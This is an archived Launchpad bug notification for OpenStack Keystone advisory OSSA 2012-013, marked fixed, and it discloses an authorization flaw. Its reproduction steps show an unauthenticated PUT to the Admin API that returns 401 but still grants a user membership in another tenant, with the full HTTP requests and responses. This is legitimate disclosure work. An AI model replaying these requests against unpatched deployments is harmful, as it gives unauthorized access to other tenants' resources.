yahoo-eng-team team mailing list archive

Thread
Date

[Bug 1040626] Re: [OSSA 2012-013] Update user's default tenant partially succeeds without authz

To: yahoo-eng-team@xxxxxxxxxxxxxxxxxxx
From: Thierry Carrez <thierry.carrez+lp@xxxxxxxxx>
Date: Fri, 07 Jun 2013 15:44:27 -0000
Reply-to: Bug 1040626 <1040626@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx

** Summary changed:

- Update user's default tenant partially succeeds without authz
+ [OSSA 2012-013] Update user's default tenant partially succeeds without authz

** Also affects: ossa
   Importance: Undecided
       Status: New

** Changed in: ossa
       Status: New => Fix Released

** Changed in: ossa
     Assignee: (unassigned) => Russell Bryant (russellb)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1040626

Title:
  [OSSA 2012-013] Update user's default tenant partially succeeds
  without authz

Status in OpenStack Identity (Keystone):
  Fix Released
Status in Keystone essex series:
  Fix Released
Status in OpenStack Security Advisories:
  Fix Released
Status in “keystone” package in Ubuntu:
  Fix Released

Bug description:
  Attempting to update a user's default tenant using the following API
  call returns unauthorized as expected, but the user is still granted
  "membership" on the newly specified tenant.

  As a normal user against the Public API:

  
      GET http://localhost:5000/v2.0/tenants
      ======================================

      X-Auth-Token: cb81c8ba4cb6428ca21b0e8de8b10ab1

  
      200 OK
      ======

      Vary: X-Auth-Token
      Content-Type: application/json

      {
        "tenants": [
          {
            "id": "2636bcb347af46c1a00055e9e0ec3cd7",
            "enabled": true,
            "description": null,
            "name": "A"
          }
        ],
        "tenants_links": []
      }

  Against the Admin API without an X-Auth-Token:

      PUT http://localhost:35357/v2.0/users/679a2bb1e113473db10827895ae9022f/tenant
      =============================================================================

      Content-Type: application/json

      {
        "user": {
          "tenantId": "77e165b067014483a5503fde1fa235d3"
        }
      }

      401 Not Authorized
      ==================

      Vary: X-Auth-Token
      Content-Type: application/json

      {
        "error": {
          "message": "The request you have made requires authentication.", 
          "code": 401, 
          "title": "Not Authorized"
        }
      }

  And the first call repeated (again, as the user in question against
  the Public API):

  
      GET http://localhost:5000/v2.0/tenants
      ======================================

      X-Auth-Token: cb81c8ba4cb6428ca21b0e8de8b10ab1

  
      200 OK
      ======

      Vary: X-Auth-Token
      Content-Type: application/json

      {
        "tenants": [
          {
            "id": "2636bcb347af46c1a00055e9e0ec3cd7",
            "enabled": true,
            "description": null,
            "name": "A"
          },
          {
            "id": "77e165b067014483a5503fde1fa235d3",
            "enabled": true,
            "description": null,
            "name": "B"
          }
        ],
        "tenants_links": []
      }

  Note that the user's default tenant is not actually updated.

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1040626/+subscriptions